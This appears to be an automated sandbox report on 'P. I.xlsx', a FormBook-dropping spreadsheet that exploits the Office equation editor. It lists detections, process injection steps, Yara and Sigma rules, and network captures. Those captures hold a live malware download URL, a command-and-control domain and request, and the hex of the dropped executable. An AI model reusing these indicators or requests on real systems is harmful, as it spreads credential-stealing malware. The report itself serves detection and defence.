Play interactive tour

Edit tour

Analysis Report P. I.xlsx

Overview

General Information

Sample Name:	P. I.xlsx
Analysis ID:	323360
MD5:	8600b18fcd47eb7a8708abdfd7266a88
SHA1:	6a7b0f2d86d7be943fc52c66156f7d3849c561ab
SHA256:	06aa501a864eff9930c64b5d9ac9ce52f947b0f993615823828d2a57c41f833a
Tags:	FormbookVelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Sigma detected: Suspicious Svchost Process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2516 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: DA5CE3FE1991B9ACEF3B0BEEC210EE9F)

vbc.exe (PID: 2844 cmdline: {path} MD5: DA5CE3FE1991B9ACEF3B0BEEC210EE9F)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

svchost.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

cmd.exe (PID: 3012 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10ac8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10e62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cb75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c661:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cc77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cdef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1187a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b8dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x125f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21c67:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22d0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1eb99:$sqlite3step: 68 34 1C 7B E1 0x1ecac:$sqlite3step: 68 34 1C 7B E1 0x1ebc8:$sqlite3text: 68 38 2A 90 C5 0x1eced:$sqlite3text: 68 38 2A 90 C5 0x1ebdb:$sqlite3blob: 68 53 D8 7F 8C 0x1ed03:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7aa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x885a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x128bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x95d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18c47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19cea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15b79:$sqlite3step: 68 34 1C 7B E1 0x15c8c:$sqlite3step: 68 34 1C 7B E1 0x15ba8:$sqlite3text: 68 38 2A 90 C5 0x15ccd:$sqlite3text: 68 38 2A 90 C5 0x15bbb:$sqlite3blob: 68 53 D8 7F 8C 0x15ce3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2824	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2516, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.23.212.188, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2516, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2516, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2380

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2380

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://198.23.212.188/reg/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: P. I.xlsx

ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: 5.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 002D4AC5h		4_2_002D4A40
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 002D4AC5h		4_2_002D4A50

Source: global traffic

DNS query: name: www.myecovet.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49166

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 20:22:22 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11Last-Modified: Thu, 26 Nov 2020 15:58:02 GMTETag: "79a00-5b5049bd7f7fe"Accept-Ranges: bytesContent-Length: 498176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 cb bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8e 07 00 00 0a 00 00 00 00 00 00 26 ac 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 4f 00 00 00 00 c0 07 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c 8c 07 00 00 20 00 00 00 8e 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 c0 07 00 00 08 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ac 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 f8 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 0

Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1Host: www.myecovet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
